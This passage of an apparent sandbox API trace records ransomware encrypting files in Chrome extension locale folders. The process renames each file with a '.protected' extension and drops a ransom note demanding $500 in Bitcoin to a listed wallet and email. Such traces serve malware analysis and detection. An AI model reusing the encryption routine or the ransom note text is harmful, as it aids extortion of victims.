HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json") returned 164 [0083.859] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json") returned 164 [0083.859] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json") 
returned 164 [0083.859] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.859] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.861] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.861] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.861] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.861] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.861] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.861] CloseHandle (hObject=0x168) returned 1 [0083.862] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.protected") returned 174 [0083.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.protected")) returned 1 [0083.862] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.862] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.862] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\RESTORE_FILES.txt") returned 168 [0083.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.863] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.863] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.863] lstrlenA (lpString="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") returned 684 [0083.863] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0083.863] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.863] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.863] CloseHandle (hObject=0x164) returned 1 [0083.863] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.863] lstrcmpiW (lpString1="mr", lpString2="Windows") returned -1 [0083.864] lstrcmpiW (lpString1="mr", lpString2="Program Files") returned -1 [0083.864] lstrcmpiW (lpString1="mr", lpString2="Program Files (x86)") returned -1 [0083.864] lstrcmpiW (lpString1="mr", lpString2="$Recycle.bin") returned 1 [0083.864] lstrcmpiW (lpString1="mr", lpString2="System Volume Information") returned -1 [0083.864] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr") returned 150 [0083.864] lstrcmpW (lpString1="mr", lpString2=".") returned 1 [0083.864] lstrcmpW (lpString1="mr", lpString2="..") returned 1 [0083.864] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\*") returned 152 [0083.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0083.864] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.864] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.864] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.864] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.864] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.864] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\.") returned 152 [0083.864] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.864] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.864] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.864] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.864] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.864] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.864] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.864] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\..") returned 153 [0083.864] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.864] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.864] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.864] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.864] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.864] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0083.864] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.864] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.864] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json") returned 164 [0083.864] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.864] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.864] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.864] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.865] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json") returned 164 [0083.865] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.865] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json") returned 164 [0083.865] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.865] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json") returned 164 [0083.865] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.865] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.866] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.866] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.866] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.867] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.867] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.867] CloseHandle (hObject=0x168) returned 1 [0083.867] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.protected") returned 174 [0083.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.protected")) returned 1 [0083.867] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.867] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.867] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\RESTORE_FILES.txt") returned 168 [0083.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.868] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.868] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.868] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.868] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.868] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.869] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.869] CloseHandle (hObject=0x164) returned 1 [0083.869] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.869] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0083.869] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0083.869] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0083.869] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0083.869] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0083.869] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms") returned 150 [0083.869] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0083.869] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0083.869] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\*") returned 152 [0083.869] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.869] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.869] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.869] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.869] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.869] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.869] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\.") returned 152 [0083.869] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.869] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.869] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.869] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.869] lstrcmpiW (lpString1="..", lpString2="Program 
Files (x86)") returned -1 [0083.869] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.869] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.869] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\..") returned 153 [0083.869] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.869] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.869] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.869] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.869] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.869] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.869] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.869] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.870] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json") returned 164 [0083.870] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.870] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.870] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.870] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.870] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.870] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json") returned 164 [0083.871] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json") returned 164 [0083.871] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json") returned 164 [0083.871] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.871] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: 